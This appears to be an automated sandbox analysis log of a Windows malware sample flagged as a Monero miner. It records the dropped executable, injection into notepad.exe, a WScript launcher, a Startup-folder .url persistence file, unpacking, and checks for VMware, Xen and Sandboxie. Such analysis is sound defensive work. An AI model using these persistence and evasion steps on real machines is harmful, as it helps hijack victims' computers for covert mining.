Source: C:\Program Files (x86)\UKhhFjtKmLGDGFhcrhfEyHJPMmjsYZTiDurTQvfJZvfLNAauVSht\kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe	Code function: String function: 013C2F80 appears 35 times
Source: C:\Program Files (x86)\UKhhFjtKmLGDGFhcrhfEyHJPMmjsYZTiDurTQvfJZvfLNAauVSht\kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe	Code function: String function: 013C16E0 appears 63 times
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Code function: String function: 00402F80 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Code function: String function: 004016E0 appears 63 times

Source: LZF5sOWnss.exe, 00000000.00000002.705522776.0000000012BC1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamenotepad.exe. vs LZF5sOWnss.exe
Source: LZF5sOWnss.exe, 00000000.00000002.710457697.000000001B470000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs LZF5sOWnss.exe
Source: LZF5sOWnss.exe, 00000000.00000002.704880107.0000000000D1D000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs LZF5sOWnss.exe
Source: LZF5sOWnss.exe, 00000000.00000002.705186483.0000000002A20000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs LZF5sOWnss.exe
Source: LZF5sOWnss.exe, 00000000.00000002.705186483.0000000002A20000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs LZF5sOWnss.exe
Source: LZF5sOWnss.exe, 00000000.00000002.705212038.0000000002A50000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs LZF5sOWnss.exe
Source: LZF5sOWnss.exe, 00000000.00000000.641047216.00000000007F4000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamemsiexec.exe0 vs LZF5sOWnss.exe
Source: LZF5sOWnss.exe	Binary or memory string: OriginalFilenamemsiexec.exe0 vs LZF5sOWnss.exe

Source: 15.2.notepad.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url, type: DROPPED	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019

Source: classification engine

Classification label: mal100.expl.evad.mine.winEXE@18/9@2/2

Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe

Code function: 13_2_004080E0 DeleteFileW,CreateToolhelp32Snapshot,LoadLibraryA,GetProcAddress,Process32First,Process32Next,ProcessIdToSessionId,Process32Next,CloseHandle,FreeLibrary,

13_2_004080E0

Source: C:\Users\user\Desktop\LZF5sOWnss.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\LZF5sOWnss.exe.log

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Mutant created: \Sessions\1\BaseNamedObjects\e9c1286a28d82a2d0ee6
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5236:120:WilError_01

Source: C:\Users\user\Desktop\LZF5sOWnss.exe

File created: C:\Users\user\AppData\Local\Temp\tmp70CE.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe

Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'

Source: LZF5sOWnss.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\Desktop\LZF5sOWnss.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\LZF5sOWnss.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\notepad.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\notepad.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: LZF5sOWnss.exe	Virustotal: Detection: 58%
Source: LZF5sOWnss.exe	Metadefender: Detection: 22%
Source: LZF5sOWnss.exe	ReversingLabs: Detection: 32%

Source: tmp70CEtmp.exe	String found in binary or memory: kIfRsNKdTulQVcrIGWrGFBNjyA+Ir5kNBlPt5sSLvBrNhJIwQE1\7QTWGRzcUuL68Y9c0EdLn0Tic3fUH9wtnc/8k8SbzdfYTi66kxvcD+lf0cEseFdz2u/Sw9bvGbHLx9F7xVvOqqa+lVfVS93gc3Iui8\7UXzQPZQfPBPG/e4+kD0UaWjwmb2uvRB9UKzF92E9KTxvvM9DBcS3fWQ95j6Jv5MHRHzh/aDdvBPNfeK+on0nbGhQjb2m/SZ9V8fEt\70
Source: tmp70CEtmp.exe	String found in binary or memory: pgz/LsWkaX78NnbyrLeJOO7p\7ykOKfUe8aM0qwMFx2zSAc6AU2bb9GIQzGKHBABAw5QbCHCDhkAvtl6SD4zCRrVGBAaOJReOiK2ZQ5t5WdSB3+uBU0VdIvtEG8AU0R\7NFZQl/AdDqkAZhGWOUPHFAD/ElsA7gFpaYewakdIollIFwmiLKP8i+cVMyJym8fGBDf/Hsq0obI+nyFiLo8wd9Y010iKJC2hh4JmH\78Rv+d5xMhMqUkWKRvyMfC9B0Jv4U
Source: tmp70CEtmp.exe	String found in binary or memory: kIfRsNKdTulQVcrIGWrGFBNjyA+Ir5kNBlPt5sSLvBrNhJIwQE1\7QTWGRzcUuL68Y9c0EdLn0Tic3fUH9wtnc/8k8SbzdfYTi66kxvcD+lf0cEseFdz2u/Sw9bvGbHLx9F7xVvOqqa+lVfVS93gc3Iui8\7UXzQPZQfPBPG/e4+kD0UaWjwmb2uvRB9UKzF92E9KTxvvM9DBcS3fWQ95j6Jv5MHRHzh/aDdvBPNfeK+on0nbGhQjb2m/SZ9V8fEt\70
Source: tmp70CEtmp.exe	String found in binary or memory: pgz/LsWkaX78NnbyrLeJOO7p\7ykOKfUe8aM0qwMFx2zSAc6AU2bb9GIQzGKHBABAw5QbCHCDhkAvtl6SD4zCRrVGBAaOJReOiK2ZQ5t5WdSB3+uBU0VdIvtEG8AU0R\7NFZQl/AdDqkAZhGWOUPHFAD/ElsA7gFpaYewakdIollIFwmiLKP8i+cVMyJym8fGBDf/Hsq0obI+nyFiLo8wd9Y010iKJC2hh4JmH\78Rv+d5xMhMqUkWKRvyMfC9B0Jv4U
Source: tmp70CEtmp.exe	String found in binary or memory: kIfRsNKdTulQVcrIGWrGFBNjyA+Ir5kNBlPt5sSLvBrNhJIwQE1\7QTWGRzcUuL68Y9c0EdLn0Tic3fUH9wtnc/8k8SbzdfYTi66kxvcD+lf0cEseFdz2u/Sw9bvGbHLx9F7xVvOqqa+lVfVS93gc3Iui8\7UXzQPZQfPBPG/e4+kD0UaWjwmb2uvRB9UKzF92E9KTxvvM9DBcS3fWQ95j6Jv5MHRHzh/aDdvBPNfeK+on0nbGhQjb2m/SZ9V8fEt\70
Source: tmp70CEtmp.exe	String found in binary or memory: pgz/LsWkaX78NnbyrLeJOO7p\7ykOKfUe8aM0qwMFx2zSAc6AU2bb9GIQzGKHBABAw5QbCHCDhkAvtl6SD4zCRrVGBAaOJReOiK2ZQ5t5WdSB3+uBU0VdIvtEG8AU0R\7NFZQl/AdDqkAZhGWOUPHFAD/ElsA7gFpaYewakdIollIFwmiLKP8i+cVMyJym8fGBDf/Hsq0obI+nyFiLo8wd9Y010iKJC2hh4JmH\78Rv+d5xMhMqUkWKRvyMfC9B0Jv4U

Source: unknown	Process created: C:\Users\user\Desktop\LZF5sOWnss.exe 'C:\Users\user\Desktop\LZF5sOWnss.exe'
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process created: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe 'C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe'
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process created: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process created: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process created: C:\Windows\notepad.exe 'C:\Windows\notepad.exe' -c 'C:\ProgramData\LKBNMTFJgl\cfg'
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process created: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe 'C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process created: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process created: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process created: C:\Windows\notepad.exe 'C:\Windows\notepad.exe' -c 'C:\ProgramData\LKBNMTFJgl\cfg'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'	Jump to behavior

Source: C:\Users\user\Desktop\LZF5sOWnss.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: LZF5sOWnss.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: LZF5sOWnss.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation:

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe

Unpacked PE file: 13.2.tmp70CEtmp.exe.3510000.3.unpack

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\LZF5sOWnss.exe

Unpacked PE file: 0.2.LZF5sOWnss.exe.7f0000.0.unpack

.NET source code contains potential unpacker

Show sources

Source: tmp70CEtmp.exe.0.dr, b.cs	.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.0.tmp70CEtmp.exe.290000.0.unpack, b.cs	.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.2.tmp70CEtmp.exe.290000.0.unpack, b.cs	.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 12.0.tmp70CEtmp.exe.560000.0.unpack, b.cs	.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 12.2.tmp70CEtmp.exe.560000.0.unpack, b.cs	.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: csrss.13.dr, b.cs	.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 13.0.tmp70CEtmp.exe.850000.0.unpack, b.cs	.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 13.2.tmp70CEtmp.exe.850000.2.unpack, b.cs	.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe

Code function: 13_2_004080E0 DeleteFileW,CreateToolhelp32Snapshot,LoadLibraryA,GetProcAddress,Process32First,Process32Next,ProcessIdToSessionId,Process32Next,CloseHandle,FreeLibrary,

13_2_004080E0

Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Code function: 4_2_00293696 pushad ; ret	4_2_00293697
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Code function: 12_2_00563696 pushad ; ret	12_2_00563697
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Code function: 13_2_00853696 pushad ; ret	13_2_00853697

Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	File created: C:\ProgramData\LKBNMTFJgl\csrss			Jump to dropped file
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	File created: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe

File created: C:\ProgramData\LKBNMTFJgl\csrss

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe

File created: C:\ProgramData\LKBNMTFJgl\csrss

Jump to dropped file

Source: C:\Windows\SysWOW64\wscript.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url

Jump to behavior

Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\notepad.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: tmp70CEtmp.exe, 00000004.00000002.802365791.0000000002A95000.00000004.00000001.sdmp

Binary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE

Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Window / User API: threadDelayed 2084			Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Window / User API: threadDelayed 4951			Jump to behavior

Source: C:\Users\user\Desktop\LZF5sOWnss.exe TID: 2600	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe TID: 6524	Thread sleep count: 2084 > 30	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe TID: 6524	Thread sleep count: 4951 > 30	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe TID: 4684	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe TID: 6896	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe TID: 2900	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6760	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\UKhhFjtKmLGDGFhcrhfEyHJPMmjsYZTiDurTQvfJZvfLNAauVSht\kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe TID: 5600	Thread sleep time: -44000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe

Code function: 13_2_00403CA0 NtClose,GetSystemInfo,RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,NtClose,

13_2_00403CA0

Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: tmp70CEtmp.exe, 00000004.00000002.802365791.0000000002A95000.00000004.00000001.sdmp	Binary or memory string: 0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: LZF5sOWnss.exe, 00000000.00000002.710457697.000000001B470000.00000002.00000001.sdmp, svchost.exe, 00000001.00000002.656761658.000001F164260000.00000002.00000001.sdmp, svchost.exe, 00000003.00000002.709100606.000002AFD9480000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.727226826.000001C0CDEC0000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.762689241.0000022EEA800000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: tmp70CEtmp.exe, 00000004.00000002.802365791.0000000002A95000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: svchost.exe, 00000007.00000002.762015121.0000022EE98E0000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWdisplaycatalogmp.microsoft.com
